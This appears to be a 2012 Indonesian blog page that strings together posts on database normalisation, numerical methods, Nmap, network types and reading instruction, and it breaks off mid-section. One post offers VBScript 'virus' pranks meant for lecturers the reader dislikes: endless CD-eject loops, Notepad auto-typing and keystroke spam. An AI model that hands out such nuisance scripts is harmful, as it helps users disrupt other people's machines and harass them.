Pages

Saturday 29 September 2012

Normalisasi DatabaseMenggunakan Metode Logika Sederhana


1. Pendahuluan
Normalisasi database biasanya jarang dilakukan dalam database skala kecil, dan dianggap tidak
diperlukan pada penggunaan personal. Namun seiring dengan berkembangnya informasi yang
dikandung dalam sebuah database, proses normalisasi akan sangat membantu dalam
menghemat ruang yang digunakan oleh setiap tabel di dalamnya, sekaligus mempercepat proses
permintaan data. Berikut ini dipaparkan metodologi logis sederhana untuk menormalkan model
data dalam sebuah database, diiringi contoh pembuatan database untuk tugas-tugas matakuliah
dalam sebuah fakultas (fiktif) dengan atribut yang disederhanakan.
Proses normalisasi model data dapat diringkas sebagai berikut:
1. Temukan entitas-entitas utama dalam model data.
2. Temukan hubungan antara setiap entitas.
3. Tentukan atribut yang dimiliki masing-masing entitas.
Normalisasi model data dilakukan dengan mengikuti langkah-langkah sederhana, mengubahnya
agar memenuhi apa yang disebut sebagai bentuk normal pertama, kedua, lalu ketiga secara
berturutan.

Proses Normalisasi Tabel DataBase
Teknik normalisasi adalah proses pengelompokan data elemen menjadi tabel-tabel yang menunjukan entity dan relasi.
Proses pembentukan tabel normal penuh ( normalisasi ) bertujuan untuk :
·         Membuat sekecil mungkin terjadinya data rangkap
·         Menghindari data yang tidak konstan terutama bila dilakukan penambahan dan penghapusan data sebagai akibat adanya data rangkap
·         Menjamin bahwa identitas tabel secara tunggal sebagai determinan semua atribute
Proses normalisasi juga digunakan pada beberapa operasi yang berhubungan dengan data record yaitu :
1)      Operasi penambahan ( insert )
2)      Operasi penghapusan ( delete )
3)      Operasi pengubahan ( update )
4)      Operasi pembacaan data
Apabila terjadi kesulitan saat proses data maka tabel-tabel dipecahkan menjadi beberapa tabel yang merupakan hasil pengelompokan data berdasarkan entity masing-masing
SYARAT DALAM MELAKUKAN NORMALISASI
1)      Adanya field ( atribute kunci )
2)      Berdasarkan kepada ketergantungan fungsi


2. Langkah-Langkah Normalisasi

A. Bentuk Normal Pertama (1NF)
Sebuah model data dikatakan memenuhi bentuk normal pertama apabila setiap atribut yang
dimilikinya memiliki satu dan hanya satu nilai. Apabila ada atribut yang memiliki nilai lebih
dari satu, atribut tersebut adalah kandidat untuk menjadi entitas tersendiri.
Entitas utama untuk database tugas matakuliah tentu saja Tugas Matakuliah. Sebagian atribut
yang dimiliki entitas ini tertera dalam Gambar 1.
Atribut Nama Kelas mencantumkan kelas-kelas di mana tugas tersebut berlaku. Apabila
pendaftar untuk sebuah matakuliah melebihi kapasitas ruangan yang dimiliki fakultas, kebijakan
yang umum diambil Kepala Program Studi adalah membagi kegiatan perkuliahan untuk
matakuliah tersebut menjadi beberapa kelas. Karenanya atribut ini rentan memiliki nilai jamak,
dan lebih sesuai menjadi entitas baru atau atribut dari entitas lain. Untuk sementara kita
membuat entitas baru, Kelas, dimana sebagian atributnya berasal dari Tugas Matakuliah yang
secara logis lebih sesuai menjadi atribut entitas ini. Sementara itu, hampir semua atribut entitas
Tugas Matakuliah selain Nama Kelas memiliki nilai tunggal (dengan asumsi setiap matakuliah
diampu oleh satu dosen saja).




1.Relasi Antar-Entitas dan Identifier
Masalah yang kita hadapi sekarang adalah menghubungkan Tugas Matakuliah dengan Kelas.Satu tugas dapat diberikan pada beberapa kelas yang berbeda; dalam terminologi pemodelandata, ini berarti antara entitas Tugas Matakuliah dan entitas Kelas terdapat relasi 1:N (atau 1-N)untuk nilai N lebih dari satu. Cara paling intuitif untuk menghubungkan kedua entitas tersebut\adalah menyertakan identitas satu entitas sebagai atribut entitas lain. Identitas sebuahentitasharuslah unik untuk menghindarkan ambiguitas saat akan merujuk pada satu objek khusus dari entitas tersebut. Entitas Tugas Matakuliah akan menggunakan pengidentifikasi arbitrer berupa angka yang berbeda antara satu objek Tugas Matakuliah dengan objek Tugas Matakuliah lain.Entitas Kelas dapat diidentifikasi dengan matakuliah dan kode kelas yang bersangkutan, sehingga kita cukup menambahkan atribut pengidentifikasi (identifier) dalam kedua entitas. Entitas ini beserta semua atribut baru dan hubungannya dengan Tugas Matakuliah diperlihatkan dalam Gambar 2, dengan menggunakan notasi relasi crows foot (dengan simbol “kaki gagak”menunjuk pada entitas jamak).
                                                                                                            Gambar 2: Hubungan antara Tugas
Matakuliah dan entitas baru, Kelas.



Sejauh ini tidak ada atribut entitas yang memiliki nilai lebih dari satu, sehingga rasanya cukup aman mengatakan bahwa model ini memenuhi bentuk normal pertama.
B. Bentuk Normal Kedua (2NF)
Sebuah model data dikatakan memenuhi bentuk normal kedua apabila ia memenuhi bentuk normal pertama dan setiap atribut non-identifier sebuah entitas bergantung sepenuhnya hanya pada semua identifier entitas tersebut. Apabila kita perhatikan kembali model data yang telah kita hasilkan di atas, segera terlihat bahwa atribut dari entitas Kelas tidak sepenuhnya bergantung pada identitas unik. Seorang dosen akan tetap ada meskipun kelas matakuliah yang ia ampu sudah tidak ada lagi. Dalam hal ini, dosen adalah entitas tersendiri (yang nantinya dapat dilekatkan pada entitas  Fakultas atau  Universitas bilamana kedua entitas tersebut dirasa perlu ada, tergantung pada kebutuhan pemodelan data kita).

A. Sekali Lagi, Tentang Identifier
Dalam dunia nyata, anggapan yang umum adalah seseorang (“individu”) dapat diidentifikasi secara unik dengan namanya. Tentu saja anggapan ini tidak sepenuhnya benar, karena bisa saja sebuah nama (bahkan satu rangkaian nama lengkap) dimiliki oleh lebih dari satu orang; pemodelan data yang melibatkan informasi tentang individu jarang menggunakan nama individu tersebut sebagai satu-satunya pengidentifikasi. Implementasi RDBMS tertentu juga akan lebih cepat memproses query atas suatu table apabila tabel tersebut diindeks oleh nilai integer unik daripada bila menggunakan indeks karakter (rangkaian karakter masih harus diumpankan ke fungsi hash agar dapat digunakan sebagai indeks tabel, sementara untuk integer unik tidak harus). Karena beberapa alasan tersebut, entitas Dosen pada model data kita akan menggunakan pengidentifikasi arbitrer berupa Nomor Induk Pegawai sebagaimana diperlihatkan dalam Gambar 3. Dalam notasi crows foot, relasi non-identifying digambarkan dengan garis putus-putus atau tersamar.
                                                                                                            Gambar 3: Ketiga entitas utama                                                                                                                                                      dalam model data dan hubungan                                                                                                                                                    antar masing-masing entitas.





Setelah atribut-atribut dari semua entitas dalam sebuah model data hanya bergantung pada seluruh pengidentifikasi entitas yang memilikinya, model data tersebut dikatakan memenuhi bentuk normal kedua.

C. Bentuk Normal Ketiga (3NF)

Sebuah model data dikatakan memenuhi bentuk normal ketiga apabila ia memenuhi bentuk normal kedua dan tidak ada satupun atribut non-identifying (bukan pengidentifikasi unik) yang bergantung pada atribut non-identifying lain. Apabila ada, pisahkan salah satu atribut tersebut menjadi entitas baru, dan atribut yang bergantung padanya menjadi atribut entitas baru tersebut. Dalam model data sederhana yang kita gunakan di sini, tidak ada satupun atribut non-identifying (seperti Deskripsi Tugas Matakuliah, atau Nama Dosen) yang bergantung pada atribut nonidentifying lain. Namun demi adanya contoh, kita misalkan entitas Dosen memiliki atribut
informasi Alamat Rumah dan Nomor Telepon Rumah. Keduanya tidak dapat secara unik mengidentifikasi objek tertentu dari entitas Dosen, namun keduanya saling bergantung. Sebagaimana dalam dua langkah normalisasi sebelumnya, jenis kebergantungan seperti ini dapat dihilangkan dengan membuat entitas baru lagi (yang tidak akan diciptakan karena tiga entitas sudah cukup banyak untuk satu artikel).
Model terakhir yang kita dapat ini telah memenuhi bentuk normal ketiga (third normal form) dan siap dikonversi menjadi tabel. Namun sebelumnya, kita perlu membahas berbagai jenis relasi yang kerap ditemui dalam pemodelan data, termasuk yang kita temui dalam contoh model data kali ini.

3. Jenis-jenis Relasi Antar-Entitas

1.      Relasi 1-1. Relasi ini jarang ditemui dalam model data yang benar, sehingga saat Anda menemukannya, kemungkinan besar hal itu berarti masih ada yang belum sempurna dari model data Anda; relasi 1-1 sering berarti kedua entitas tersebut sebenarnya adalah kesatuan, satu entitas tunggal. Kemungkinan lain adalah relasi 1-1 ini adalah relasi turunan atau relasi non-identifying (identitas unik satu entitas tidak bergantung pada identitas unik entitas lain) namun jenis relasi kedua ini jarang ditemui.
2.      Relasi 1-N. Relasi ini yang paling umum ditemui dalam model data.
3.      Relasi M-N. Relasi ini juga sering ditemui dalam model data, dan sering pula dapat dinormalkan lebih jauh lagi.  Langkah yang dapat ditempuh untuk menormalkan relasi M-N:
a. Buat sebuah entitas baru sebagai penghubung antara kedua entitas dengan relasi MN
tersebut. Entitas penghubung ini akan memiliki hubungan 1-M dengan masingmasing   entitas awal. Identifier entitas penghubung dapat dibuat tersendiri, atau dengan cara mewarisi identifier kedua entitas awal dan membuat keduanya identifier unik entitas penghubung ini. Sering kali akan ada atribut lain yang dimiliki oleh entitas penghubung tersebut. Entitas Kelas dalam contoh model data kita dapat menjadi contoh entitas penghubung. Apabila tidak ada entitas penghubung yang dapat diciptakan, relasi M-N tetap harus diubah untuk menghindari kesulitan dalam konversi model data menjadi skema database fisik.

4. Menterjemahkan Model Data

Setelah sebuah model data dinormalisasikan dan siap diubah menjadi database fisik, ada beberapa langkah penterjemahan yang harus dilakukan:
1.      Setiap entitas menjadi tabel tersendiri.
2.      Setiap atribut menjadi kolom-kolom tabel tersebut, dengan tipe data yang sesuai.
3.      Identifier entitas tersebut menjadi kolom ID yang tidak boleh kosong (NOT NULL)   dan berisi indeks yang unik. ID unik ini dalam database dinamakan primary key.
4.      Relasi diterjemahkan menjadi foreign key.
Skema fisik model data yang dihasilkan tampak dalam Gambar 4. Perhatikan penghilangan spasi, penentuan tipe data dan penyeragaman kapitalisasi untuk portabilitas skema untuk digunakan dalam berbagai implementasi RDBMS yang mungkin berbeda dalam casesensitivity.

                                                                                               
 









Gambar 4: Skema fisik final dari contoh model data



Dan perintah SQL untuk menciptakan ketiga tabel tersebut adalah:









Script SQL di atas menggunakan tipe data dan konfigurasi tabel yang didukung oleh MySQL. Deklarasi TYPE=InnoDB untuk setiap tabel adalah agar MySQL menggunakan InnoDB yang mendukung penggunaan foreign key. Tanpa deklarasi tersebut MySQL secara default akan menggunakan mesin penyimpan MyISAM yang tidak dapat mendukung foreign key.
A.   Foreign Key
Beberapa catatan khusus mengenai penterjemahan relasi menjadi foreign key:
1.      Relasi 1-1 diterjemahkan menjadi “identifier salah satu tabel menjadi foreign key dalam tabel lain”. Keputusan mengenai tabel mana yang harus menerima identifier tabel lain dapat diambil sesuai keinginan, dan secara teori tidak begitu berpengaruh. Namun, seringkali pertimbangan praktis yang akan menentukan tabel mana yang akan berisi foreign key.
2.      Khusus untuk penggunaan MySQL sebagai penyimpan database: sampai MySQL versi 5.0 hanya storage engine InnoDB yang mendukung penggunaan foreign key. Mesin penyimpanan lain yang digunakan MySQL versi 5.0 atau dibawahnya (seperti MyISAM atau BDB) tidak mendukung konfigurasi FOREIGN KEY dalam perintah SQL CREATE TABLE, dan akan mengabaikannya apabila ia ditemui.

5. Contoh Penggunaan Database Ternormalisasi
Untuk model data non-trivial, database ternormalisasi hampir selalu berisi lebih dari satu tabel, sehingga demi kemudahan pengelolaan, biasanya satu database hanya berisi tabel-tabel yang terkait dalam satu model data saja.
Di bawah ini terdapat contoh query SQL untuk database ternormalisasi untuk membedakan dengan model data yang hanya menggunakan satu tabel.



Perintah INSERT di atas akan menambah data dosen baru dan dua kelas yang diampu beliau.







Perintah INSERT dan UPDATE di atas menambah data tugas baru dari dosen tertentu dan memperbarui data untuk setiap kelas yang diampu dosen tersebut.



Perintah SELECT di atas akan menampilkan informasi tentang deskripsi sebuah tugas yang diberikan pada kelas-kelas matakuliah yang diampu oleh dosen tersebut, ditambah dengan
informasi tanggal penyerahan tugas terakhir.

6. Penutup

Model data di atas dan semua query yang diberikan kepada database yang dihasilkan masih sangat sederhana (Salah satunya adalah penggunaan asumsi bahwa beberapa kelas untuk matakuliah tertentu hanya diampu oleh satu dosen dan mendapat tugas satu-persatu secara sekuensial – asumsi yang terlalu baik hati) dan tidak sepenuhnya memanfaatkan semua kemudahan dan potensi yang ditawarkan baik oleh SQL maupun oleh fasilitas-fasilitas setiap implementasi RDBMS yang mendukung SQL. Demi keringkasan dan kesederhanaan contoh, saya tidak membahas antara lain mengenai relasi turunan (inheritance) serta berbagai notasi grafis model data lain seperti ER dan berbagai turunannya.
Aplikasi yang saya gunakan untuk menggambar model data dan menterjemahkannya menjadi skema database fisik adalah DBDesigner 4 dari fabForce yang secara eksplisit mendukung MySQL dan berbagai mesin penyimpanan yang digunakan produk tersebut. Script SQL CREATE TABLE yang dihasilkan kemudian ditulis ke clipboard untuk di-paste ke artikel ini dan ke file msql untuk dieksekusi oleh MySQL (versi 5.0). Batasan-batasan terkait mesin penyimpanan yang saya paparkan di atas tidak berlaku pada implementasi RDBMS lain (table dalam PostgreSQL dan SQL Server, misalnya, secara default mendukung foreign key). Sebagai latihan, Anda dapat mencoba memperluas model data di atas atau membuat model data sendiri, lalu menggunakan perintah query yang lebih efisien; salah satu contoh adalah perintah SELECT dengan modifier INNER / OUTER JOIN yang memberi Anda kendali yang lebih besar dan fleksibel untuk mendapat set hasil yang Anda inginkan dari sumber data multi-tabel.



Prinsip-Prinsip Metode Numerik dan Pemakaian Metode Numerik.

1. Definisi Metode Numerik
Metode Numerik adalah teknik untuk menyelesaikan permasalahan-permasalahan yang diformulasikan secara matematik dengan cara operasi hitungan (arithmetic).

Mengapa Harus Metode Numerik ?

Alasan pemakaian metode numerik ini karena tidak semua permasalahan matematis atau perhitungan matematis dapat diselesaikan dengan mudah. Bahkan dalam prinsip matematik, suatu persoalan matematik yang paling pertama dilihat adalah apakah persoalan itu memiliki penyelesaian atau tidak.

Jadi, Jika suatu persoalan sudah sangat sulit atau tidak mungkin diselesaikan dengan metode matematis (analitik) maka kita dapat menggunakan metode numerik sebagai elternative penyelesaian persoalan tersebut.

2. Prinsip-Prinsip Metode Numerik
-> Digunakan jika metode analitik tidak dapat digunakan lagi
-> Metode Numerik merupakan pendekatan untuk mendapatkan pemecahan masalah yang dapat dipertanggung jawabkan secara analitik
-> Pendekatannya merupakan analisis matematis
-> Metode Numerik terdiri atas algoritma-algoritma yang dapat dihitung secara cepat dan mudah
-> Karena berasal dari alogaritma pendekatan, maka Metode Numerik ini akan memakai iterasi (pengulangan)
-> Nilai kesalahan merupakan hal paling utama untuk mengetahui seberapa baik metode yang digunakan.

3. Pemakaian Metode Numerik
Pemakaian Metode Numerik biasanya dilakukan untuk menyelesaikan persoalan matematis yang penyelesaiannya sulit didapatkan dengan menggunakan metode analitik, yaitu :
1. Menyelesaikan persamaan non linier
2. Menyelesaikan persamaan simultan
3. Menyelesaikan differensial dan integral
4. Interpolasi dan Regresi
5. Menyelesaikan persamaan differensial
6. Masalah multi variable untuk menentukan nilai optimal yang tak bersyarat

Source:http://nationalinks.blogspot.com/

Deskripsi dan Pengertian NMap


Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.

Output Nmap adalah sebuah daftar target yang diperiksa, dengan informasi tambahannya tergantung pada opsi yang digunakan. Hal kunci di antara informasi itu adalah “tabel port menarik”. Tabel tersebut berisi daftar angka port dan protokol, nama layanan, dan status. Statusnya adalah terbuka (open), difilter (filtered), tertutup (closed), atau tidak difilter (unfiltered). Terbuka berarti bahwa aplikasi pada mesin target sedang mendengarkan (listening) untuk koneksi/paket pada port tersebut. Difilter berarti bahwa sebuah firewall, filter, atau penghalang jaringan lainnya memblokir port sehingga Nmap tidak dapat mengetahui apakah ia terbuka atau tertutup. Tertutup port tidak memiliki aplikasi yang sedang mendengarkan, meskipun mereka dapat terbuka kapanpun. Port digolongkan sebagai tidak difilter ketika mereka menanggapi probe Nmap, namun Nmap tidak dapat menentukan apakah mereka terbuka atau tertutup. Nmap melaporkan kombinasi status open|filtered dan closed|filtered ketika ia tidak dapat menentukan status manakah yang menggambarkan sebuah port. Tabel port mungkin juga menyertakan detil versi software ketika diminta melakukan pemeriksaan versi. Ketika sebuah pemeriksaan protokol IP diminta (-sO), Nmap memberikan informasi pada protokol IP yang didukung alih-alih port-port yang mendengarkan.

Selain tabel port yang menarik, Nmap dapat pula memberikan informasi lebih lanjut tentang target, termasuk nama reverse DNS, prakiraan sistem operasi, jenis device, dan alamat MAC.

Pemeriksaan Nmap yang umum ditunjukkan dalam Example 1. Argumen yang digunakan pada contoh ini hanyalah -A, untuk memeriksa sistem operasi dan versi, pemeriksaan skrip, dan traceroute; -T4 untuk eksekusi yang lebih cepat; dan dua buah nama host target.
Example 1. Sebuah gambaran pemeriksaan Nmap


# nmap -A -T4 scanme.nmap.org

Starting Nmap ( http://nmap.org )
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 994 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp  closed smtp
53/tcp  open   domain  ISC BIND 9.3.4
70/tcp  closed gopher
80/tcp  open   http    Apache httpd 2.2.2 ((Fedora))
|_ HTML title: Go ahead and ScanMe!
113/tcp closed auth
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.20-1 (Fedora Core 5)

TRACEROUTE (using port 80/tcp)
HOP RTT   ADDRESS
[Cut first seven hops for brevity]
8   10.59 so-4-2-0.mpr3.pao1.us.above.net (64.125.28.142)
9   11.00 metro0.sv.svcolo.com (208.185.168.173)
10  9.93  scanme.nmap.org (64.13.134.52)

Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

Wednesday 5 September 2012

Cara membuat Virus Nakal



Yuk buat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.

Caranya: Buka notepad dan masukkan code berikut,Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop





Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.





Nah mau script .vbs yang laen lagi?WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop





Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik?

ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as






Kode Vbs ini akan membuat user terus mengetikkan kata2 “Kamu emang jelek koq!” Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop


Dan membuat terus menerus menekan tombol “Enter”Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Terus tekan backspace:MsgBox "Balik lagi ah...saltik"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop





Lanjut: http://www.hong.web.id/tutorial/cara-membuat-virus-nakal#ixzz0z12pKA68


JARINGAN WORKGROUP, LAN & WAN

Penggabungan teknologi komputer dan komunikasi berpengaruh sekali terhadap bentuk organisasi sistem komputer. Dewasa ini, konsep "pusat komputer", dalam sebuah ruangan yang berisi sebuah komputer besar, tempat dimana semua pengguna mengolah pekerjaannya, merupakan konsep yang sudah ketinggalan jaman. Model komputer tunggal yang melayani seluruh tugas-tugas komputasi suatu organisasi telah diganti oleh sekumpulan komputer berjumlah banyak yang terpisah-pisah tetapi saling berhubungan dalam melaksanakan tugasnya. Sistem seperti ini disebut sebagai Jaringan Komputer (Computer Network) .


Apa jaringan komputer itu dan apa manfaatnya?
Jaringan Komputer dapat diartikan sebagai suatu himpunan interkoneksi sejumlah komputer otonom. Dua buah komputer dikatakan membentuk suatu network bila keduanya dapat saling bertukar informasi. Pembatasan istilah otonom disini adalah untuk membedakan dengan sistem master/slave. Bila sebuah komputer dapat membuat komputer lainnya aktif atau tidak aktif dan mengontrolnya, maka komputer komputer tersebut tidak otonom. Sebuah sistem dengan unit pengendali (control unit) dan sejumlah komputer lain yang merupakan slave bukanlah suatu jaringan; komputer besar dengan remote printer dan terminalpun bukanlah suatu jaringan.

Manfaat Jaringan

Secara umum, jaringan mempunyai beberapa manfaat yang lebih dibandingkan dengan komputer yang berdiri sendiri dan dunia usaha telah pula mengakui bahwa akses ke teknologi informasi modern selalu memiliki keunggulan kompetitif dibandingkan pesaing yang terbatas dalam bidang teknologi.
Jaringan memungkinkan manajemen sumber daya lebih efisien. Misalnya, banyak pengguna dapat saling berbagi printer tunggal dengan kualitas tinggi, dibandingkan memakai printer kualitas rendah di masing-masing meja kerja. Selain itu, lisensi perangkat lunak jaringan dapat lebih murah dibandingkan lisensi stand-alone terpisah untuk jumlah pengguna sama.
Jaringan membantu mempertahankan informasi agar tetap andal dan up-to-date. Sistem penyimpanan data terpusat yang dikelola dengan baik memungkinkan banyak pengguna mengaskses data dari berbagai lokasi yang berbeda, dan membatasi akses ke data sewaktu sedang diproses.
Jaringan membantu mempercepat proses berbagi data (data sharing). Transfer data pada jaringan selalu lebih cepat dibandingkan sarana berbagi data lainnya yang bukan jaringan.
Jaringan memungkinkan kelompok-kerja berkomunikasi dengan lebih efisien. Surat dan penyampaian pesan elektronik merupakan substansi sebagian besar sistem jaringan, disamping sistem penjadwalan, pemantauan proyek, konferensi online dan groupware, dimana semuanya membantu team bekerja lebih produktif.
Jaringan membantu usaha dalam melayani klien mereka secara lebih efektif. Akses jarak-jauh ke data terpusat memungkinkan karyawan dapat melayani klien di lapangan dan klien dapat langsung berkomunikasi dengan pemasok.


Ada tiga tipe jaringan yang umum yang digunakan antara lain :
-          Jaringan WorkGroup,
-          Janringan Lan, dan
-          Jaringan Wan


Jaringan Workgroup
Jaringan ini terdiri dari beberapa unit komputer yang dihubungkan dengan menggunakan Network Interface Card atau yang biasa disebut dengan Local Area Network Card, serta dengan menggunakan kabel BNC maupun UTP. Semua unit komputer yang terhubung dapat mengakses data dari unit komputer lainnya dan juga dapat melakukan print document pada printer yang terhubung dengan unit komputer lainnya.

Keuntungan Jaringan Workgroup.
  • Pertukaran file dapat dilakukan dengan mudah (File Sharing).
  • Pemakaian printer dapat dilakukan oleh semua unit komputer (Printer Sharing).
  • Akses data dari/ke unit komputer lain dapat di batasi dengan tingkat sekuritas pada password yang diberikan.
  • Komunikasi antar karyawan dapat dilakukan dengan menggunakan E-Mail & Chat.
  • Bila salah satu unit komputer terhubung dengan modem, maka semua atau sebagian unit komputer pada jaringan ini dapat mengakses ke jaringan Internet atau mengirimkan fax melalui 1 modem.





Jaringan LAN
LAN (Local Area Network) adalah suatu kumpulan komputer, dimana terdapat beberapa unit komputer (client) dan 1 unit komputer untuk bank data (server). Antara masing-masing client maupun antara client dan server dapat saling bertukar file maupun saling menggunakan printer yang terhubung pada unit-unit komputer yang terhubung pada jaringan LAN.
Berdasarkan kabel yang digunakan ,ada dua cara membuat jaringan LAN, yaitu  dengan kabel BNC dan kabel UTP.

Keuntungan Jaringan LAN.
  • Pertukaran file dapat dilakukan dengan mudah (File Sharing).
  • Pemakaian printer dapat dilakukan oleh semua client (Printer Sharing).
  • File-file data dapat disimpan pada server, sehingga data dapat diakses dari semua client menurut otorisasi sekuritas dari semua karyawan, yang dapat dibuat berdasarkan struktur organisasi perusahaan sehingga keamanan data terjamin.
  • File data yang keluar/masuk dari/ke server dapat di kontrol.
  • Proses backup data menjadi lebih mudah dan cepat.
  • Resiko kehilangan data oleh virus komputer menjadi sangat kecil sekali.
  • Komunikasi antar karyawan dapat dilakukan dengan menggunakan E-Mail & Chat.

  • Bila salah satu client/server terhubung dengan modem, maka semua atau sebagian komputer pada jaringan LAN dapat mengakses ke jaringan Internet atau mengirimkan fax melalui 1 modem.







Jaringan WAN
WAN (Wide Area Network) adalah kumpulan dari LAN dan/atau Workgroup yang dihubungkan dengan menggunakan alat komunikasi modem dan jaringan Internet, dari/ke kantor pusat dan kantor cabang, maupun antar kantor cabang. Dengan sistem jaringan ini, pertukaran data antar kantor dapat dilakukan dengan cepat serta dengan biaya yang relatif murah. Sistem jaringan ini dapat menggunakan jaringan Internet yang sudah ada, untuk menghubungkan antara kantor pusat dan kantor cabang atau dengan PC Stand Alone/Notebook yang berada di lain kota ataupun negara.
Keuntungan Jaringan WAN.
  • Server kantor pusat dapat berfungsi sebagai bank data dari kantor cabang.
  • Komunikasi antar kantor dapat menggunakan E-Mail & Chat.
  • Dokumen/File yang biasanya dikirimkan melalui fax ataupun paket pos, dapat dikirim melalui E-mail dan Transfer file dari/ke kantor pusat dan kantor cabang dengan biaya yang relatif murah dan dalam jangka waktu yang sangat cepat.
  • Pooling Data dan Updating Data antar kantor dapat dilakukan setiap hari pada waktu yang ditentukan.






Tuesday 4 September 2012

JENIS SURAT



 Reading
a. Approaches to Reading
            A reading approach is a way to start teaching beginning readers.
This introduction to reading skills is best discussed and worked through with two or three colleagues. It aims to generate discussion on the key issues in reading we need to consider as well as giving readers the opportunity to pick one another’s activity closets for those real gems we all have tucked away
Reading is an active skill which involves inference, guessing, predicting etc. It also has, more often than not, a communicative function. We rarely answer questions after reading a text except in a language class, but we do write answers to letters, follow directions, choose restaurants and holidays, solve problems and compare the information to our previous knowledge or the knowledge of others.


b. Reading methods
Four main methods used to teach students how to read are explained below. This is a guide only and you must work out which methods suit you and your students. You may like to try each one for a few weeks and record the results or you can combine two or more methods together like the ‘phonics’ and the ‘look and say’ method. Whichever way you choose be patient, consistent and above all creative. Creativity is very important to keep any child’s interest and enthusiasm at all times. If you are not sure what you should be teaching at which level, check out the year guide
Method 1:
PhoneticThe phonics method is probably the best known and widely used method to teach reading and writing in the English language. It relies on children being taught the alphabet first. They learn the names of the letters and the sounds they make. Once they have learnt the letter sounds they will begin to blend two letters together to make simple words then three letters, then four and so forth.
Method 2:
With the ‘look and say’ method children learn to recognize whole words or sentences rather than individual sounds. Your student will look at a word which you sound, and in turn will repeat the sound (the word). Flashcards with individual words written on them are used for this method often accompanied with a related picture.
If you don’t use a picture with the word the child will probably make a wild guess as to what it says trying to remember what sound you made previously. This is not a good method if you don’t include pictures.
It is also recommended with this method to use whole short sentences rather than individual words. Write a short sentence representing the picture displayed. Say the sentence and ask the child to repeat it while pointing and looking at each individual word as he/she repeats what you said.
Method3:
The language experience approach is the third method you may like to use. This particular method actually uses student’s own words to help them read. Your student may draw a picture of Dad in the car. In that case you would write underneath the drawing; Dad is in the car.
You continue to collect drawings your student makes and write a short sentence underneath each drawing. A picture of a playground would read; We went to the park or playground.
Method 4:
When your students are just learning to read it is important to choose books that really interest them. If boys like cars, choose a book with pictures and simple words about cars. This will keep their interest and they will enjoy learning with you. If girls like dolls, obtain a book with doll pictures and simple words. Again it will encourage enthusiasm because they are actually looking at something they can relate to
Some books are especially written to support this method of learning. You will find a longer sentence on one side of the page while the other side has a single word or maybe two to three words for your student to read. You will read the longer sentence while your student reads the simpler version.

c. Reading Techniques
Throughout your career as a Curtin student you will be required to read a variety of texts and to gather material from them for assignments. Here are some guidelines for effective reading.
Reading Techniques.
1. Preview
Preview the text to be read by skimming it. Skimming is the technique of allowing your eyes to travel rapidly over a page, stopping here and there to register the main idea. When skimming, you should follow the procedure below, adapting it to your purpose
• Read the title.
• Note the writer’s name.
• Note the date and place of publication.
• Read the first paragraph completely.
• Read sub-headings and first sentences of remaining paragraphs.
As you read, pick up main ideas, key words (words that tell you who, what, when, where, how many, and how much), and transition markers (words like ‘however’, ‘alternatively’, ‘additionally’, and so on), which suggest the direction of ideas in the text.

2. Question
